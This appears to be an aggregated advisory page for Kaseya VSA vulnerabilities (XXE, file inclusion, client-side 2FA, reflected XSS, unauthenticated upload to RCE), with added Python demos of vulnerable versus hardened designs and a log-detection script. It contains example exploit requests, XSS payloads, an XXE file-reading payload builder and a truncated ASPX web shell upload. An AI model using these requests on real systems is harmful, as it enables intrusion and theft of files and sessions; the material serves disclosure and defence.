
CVSS: 7.5 | EPSS: 0% | CPEs: 1 | EXPL: 1

CVE-2021-30201: the API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed, external entities declared in it are resolved and fetched by the system, and their contents are returned to the attacker. Detailed description: given the following request:

```
POST /vsaWS/KaseyaWS.asmx HTTP/1.1
Content-Type: text/xml;charset=UTF-8
Host: 192.168.1.194:18081
Content-Length: 406

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS">
<soapenv:Header/>
<soapenv:Body>
<kas:PrimitiveResetPassword>
<!--type: string-->
<kas:XmlRequest><![CDATA[<!
```

• https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30201 https://csirt.divd.nl/DIVD-2021-00011 https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 • CWE-611: Improper Restriction of XML External Entity Reference
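The flaw class above, reproduced as an added example that is not Kaseya's code: the XML unwrapped from a request field (the advisory's XmlRequest) is handed to a parser, and whether a SYSTEM entity is fetched depends on one parser setting. Python's xml.sax is used here because it exposes that setting directly; the element names, the entity name and the file contents are constructed for the demo.

```python
# Added example (not Kaseya's code): the XXE pattern above, reproduced with
# Python's xml.sax so the vulnerable and hardened parser settings sit side by side.
# The XML element names and the file contents are constructed for the demo.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, which is where a resolved entity's bytes end up."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_inner_request(xml_bytes, resolve_external_entities):
    """Parse the XML a web service would unwrap from a field such as XmlRequest.

    resolve_external_entities=True mirrors a parser that fetches SYSTEM entities
    (the vulnerable configuration); False is the hardened setting.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def build_payload(local_path):
    """Attacker-controlled XML: a DTD declaring an external entity for a local file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE request [<!ENTITY xxe SYSTEM "{local_path}">]>\n'
        "<request><user>&xxe;</user></request>"
    ).encode()


def demo():
    """Return (text seen by the vulnerable parser, text seen by the hardened parser)."""
    # Constructed stand-in for a secret the server can read but the client cannot.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=constructed-secret")
        secret_path = f.name
    try:
        payload = build_payload(secret_path)
        leaked = parse_inner_request(payload, resolve_external_entities=True)
        safe = parse_inner_request(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

With entity resolution on, the file contents come back inside the `<user>` element, which is exactly the round trip the advisory describes; with it off, the reference is left unexpanded. For an ASP.NET service such as the one above, the equivalent hardening is an XmlReaderSettings with DtdProcessing set to Prohibit and XmlResolver set to null, applied to every place the unwrapped XML is parsed, not only the SOAP envelope.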

CVSS: 6.5 | EPSS: 0% | CPEs: 1 | EXPL: 1

CVE-2021-30121: semi-authenticated local file inclusion. The contents of arbitrary files can be returned by the web server. Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp`. A valid sessionId is required but can be easily obtained via CVE-2021-30118.
• https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30121 https://csirt.divd.nl/DIVD-2021-00011 • CWE-829: Inclusion of Functionality from Untrusted Control Sphere

CVSS: 9.9 | EPSS: 0% | CPEs: 1 | EXPL: 0

CVE-2021-30120: Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The requirement to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed with a local intercepting proxy, rendering 2FA useless. Detailed description: during the login process, after the user authenticates with username and password, the server sends a response to the client containing the booleans MFARequired and MFAEnroled. If the attacker has obtained a user's password and uses an intercepting proxy (e.g.
• https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csrit.divd.nl/CVE-2021-30120 https://csrit.divd.nl/DIVD-2021-00011 • CWE-669: Incorrect Resource Transfer Between Spheres
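The design point behind this entry, as an added example that is not Kaseya's implementation: a login server that only reports MFARequired/MFAEnroled to the client (the advisory's field names) next to one that keeps the "MFA pending" state in the session and checks it on every protected request. The user store, session handling, TOTP value and the client flow are constructed for the demo.

```python
# Added example (not Kaseya's code): why MFA must be enforced server-side.
# MFARequired/MFAEnroled are the field names from the advisory; the user store,
# session handling and TOTP value are constructed for the demo.
import hashlib
import hmac
import secrets

# Constructed user record; a real system would use a salted password hash and real TOTP.
USERS = {
    "alice": {
        "pw_hash": hashlib.sha256(b"correct-horse").hexdigest(),
        "mfa_enrolled": True,
        "totp": "123456",
    },
}


def password_ok(user, password):
    record = USERS.get(user)
    if record is None:
        return False
    return hmac.compare_digest(hashlib.sha256(password.encode()).hexdigest(), record["pw_hash"])


class ClientEnforcedMfa:
    """Vulnerable pattern: the server only tells the client that MFA is needed."""

    def __init__(self):
        self.sessions = {}

    def login(self, user, password):
        if not password_ok(user, password):
            return None
        sid = secrets.token_hex(8)
        self.sessions[sid] = {"user": user}
        enrolled = USERS[user]["mfa_enrolled"]
        # The client reads these booleans to decide whether to show the MFA step.
        return {"sessionId": sid, "MFARequired": enrolled, "MFAEnroled": enrolled}

    def verify_mfa(self, sid, code):
        user = self.sessions[sid]["user"]
        return hmac.compare_digest(code, USERS[user]["totp"])

    def protected_resource(self, sid):
        # Only checks that the session exists; MFA completion is never consulted.
        return sid in self.sessions


class ServerEnforcedMfa(ClientEnforcedMfa):
    """Hardened pattern: the session stays 'MFA pending' until the server itself
    has verified the second factor, whatever the client was told."""

    def login(self, user, password):
        resp = super().login(user, password)
        if resp is not None:
            # Sessions of enrolled users start without MFA satisfied.
            self.sessions[resp["sessionId"]]["mfa_ok"] = not USERS[user]["mfa_enrolled"]
        return resp

    def verify_mfa(self, sid, code):
        ok = super().verify_mfa(sid, code)
        if ok:
            self.sessions[sid]["mfa_ok"] = True
        return ok

    def protected_resource(self, sid):
        session = self.sessions.get(sid)
        return bool(session and session["mfa_ok"])


def client_flow(server, proxy_rewrites_response):
    """One client login. With proxy_rewrites_response=True the login response is
    modified in transit (as an intercepting proxy would do) so the client
    believes no MFA step is required and skips it."""
    resp = server.login("alice", "correct-horse")
    if proxy_rewrites_response:
        resp["MFARequired"] = False
    if resp["MFARequired"]:
        server.verify_mfa(resp["sessionId"], "123456")
    return server.protected_resource(resp["sessionId"])


if __name__ == "__main__":
    for cls in (ClientEnforcedMfa, ServerEnforcedMfa):
        print(cls.__name__, "bypassed:", client_flow(cls(), proxy_rewrites_response=True))
```

The booleans in the login response are fine as UI hints; the bug is that nothing on the server side ever checks whether the second factor was actually presented before the session is accepted elsewhere.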

CVSS: 5.4 | EPSS: 0% | CPEs: 1 | EXPL: 1

CVE-2021-30119: authenticated reflected XSS in /HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is returned unescaped in the requested web page and can be used to perform a cross-site scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>`. The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`.
• https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30119 https://csirt.divd.nl/DIVD-2021-00011 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSS: 10.0 | EPSS: 0% | CPEs: 1 | EXPL: 1

CVE-2021-30118: the API /SystemTab/uploader.aspx of Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the web server process and subsequently use these files to execute ASP commands. Detailed description: given the following request:

```
POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1
Host: 192.168.1.194
Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219
Content-Length: 12

<%@ Page Language="C#" Debug="true" validateRequest="false" %>
<%@ Import namespace="System.Web.UI.WebControls" %>
<%@ Import namespace="System.Diagnostics" %>
<%@ Import namespace="System.IO" %>
<%@ Import namespace="System" %>
<%@ Import namespace="System.Data" %>
<%@ Import namespace="System.Data.SqlClient" %>
<%@ Import namespace="System.Security.AccessControl" %>
<%@ Import namespace="System.Security.Principal" %>
<%@ Import namespace="System.Collections.Generic" %>
<%@ Import namespace="System.Collections" %>
<script runat="server">
private const string password = "pass"; // The password ( pass )
private const string style = "dark"; // The style ( light / dark )
protected void Page_Load(object sender, EventArgs e)
{
    //this.Remote(password);
    this.Login(password);
    this.Style();
    this.ServerInfo();
<snip>
```

The attacker controls the name of the file written via the qqfile parameter and its location via the PathData parameter. Even though the call requires that a sessionId cookie is passed, the sessionId is not actually validated: any numeric value is accepted as valid.
• https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30118 https://csirt.divd.nl/DIVD-2021-00011 https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021 • CWE-434: Unrestricted Upload of File with Dangerous Type
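Detection logic for the web-visible entries on this page (the uploader.aspx upload above, the js.aspx file inclusion and the rcResults.asp/done.asp reflected parameters), as an added example that is not part of the advisories. It runs over constructed IIS-style log lines (date, time, method, URI stem, URI query, status); the log lines, the field layout and the thresholds are assumptions for the demo, and the endpoint paths and parameter names are the ones the advisories give.

```python
# Added example (not from the advisories): detection rules for the VSA endpoints
# listed on this page, run over constructed IIS-style log lines. Fields are
# date time method uri-stem uri-query status; none of the lines are real captures.
import re
from urllib.parse import parse_qs

SAMPLE_LOG = """\
2021-07-02 10:00:01 POST /SystemTab/uploader.aspx Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&qqfile=shellz.aspx 200
2021-07-02 10:00:05 GET /KLC/js/Kaseya.SB.JS/js.aspx path=C:\\Kaseya\\WebPages\\dl.asp 200
2021-07-02 10:00:09 GET /HelpDeskTab/rcResults.asp result=%3Cscript%3Ealert(document.cookie)%3C/script%3E 200
2021-07-02 10:00:12 GET /done.asp FileName=%22%3B%3C/script%3E%3Cscript%3Ealert(1)%3Ba=%22&PathData=&originalName=shell.aspx 200
2021-07-02 10:00:20 GET /KLC/js/Kaseya.SB.JS/js.aspx path=js/Kaseya.SB.JS/app.js 200
2021-07-02 10:00:25 POST /SystemTab/uploader.aspx Filename=report.pdf&PathData=C%3A%5CKaseya%5CTemp%5C&qqfile=report.pdf 200
2021-07-02 10:00:30 GET /index.asp - 200
"""

SCRIPT_EXT = re.compile(r"\.(asp|aspx|ashx|asmx)$", re.I)      # executable by IIS
ABS_OR_TRAVERSAL = re.compile(r"^[A-Za-z]:[\\/]|^[\\/]|\.\.")    # C:\..., \..., /..., ..
MARKUP_BREAKOUT = re.compile(r"""[<>"']""")                       # leaves an HTML/JS context


def parse_query(raw):
    """IIS logs '-' for an empty query; values are percent-encoded."""
    if raw in ("", "-"):
        return {}
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def inspect(line):
    """Return (cve, reason) when a log line matches one of the page's patterns, else None."""
    parts = line.split()
    if len(parts) < 6:
        return None
    method, stem, query = parts[2], parts[3].lower(), parse_query(parts[4])

    # CVE-2021-30118: script uploaded through uploader.aspx, or any upload into WebPages.
    if method == "POST" and stem.endswith("/systemtab/uploader.aspx"):
        names = [query.get("Filename", ""), query.get("qqfile", "")]
        if any(SCRIPT_EXT.search(n) for n in names) or "webpages" in query.get("PathData", "").lower():
            return ("CVE-2021-30118", f"script upload via uploader.aspx: {names}")

    # CVE-2021-30121: js.aspx asked for an absolute or traversing path.
    if stem.endswith("/klc/js/kaseya.sb.js/js.aspx"):
        path = query.get("path", "")
        if ABS_OR_TRAVERSAL.search(path):
            return ("CVE-2021-30121", f"absolute or traversing path in js.aspx: {path}")

    # CVE-2021-30119: markup in the parameters the pages reflect unescaped.
    if stem.endswith("/helpdesktab/rcresults.asp") or stem.endswith("/done.asp"):
        for param in ("result", "FileName"):
            value = query.get(param, "")
            if MARKUP_BREAKOUT.search(value):
                return ("CVE-2021-30119", f"markup in reflected parameter {param}: {value[:40]}")

    return None


def scan(log_text):
    """Run inspect() over every line and return the findings with their line numbers."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        hit = inspect(line)
        if hit is not None:
            findings.append({"line": number, "cve": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['cve']} - {finding['reason']}")
```

Two caveats a practitioner should keep in mind: the uploader rule keys on a script extension or a WebPages destination, but the advisory says PathData is attacker-controlled, so any POST to uploader.aspx from an unexpected source is worth review; and because IIS logs carry no request body, the XXE entry for /vsaWS/KaseyaWS.asmx cannot be matched from these fields at all and needs a WAF or proxy log that records the SOAP payload.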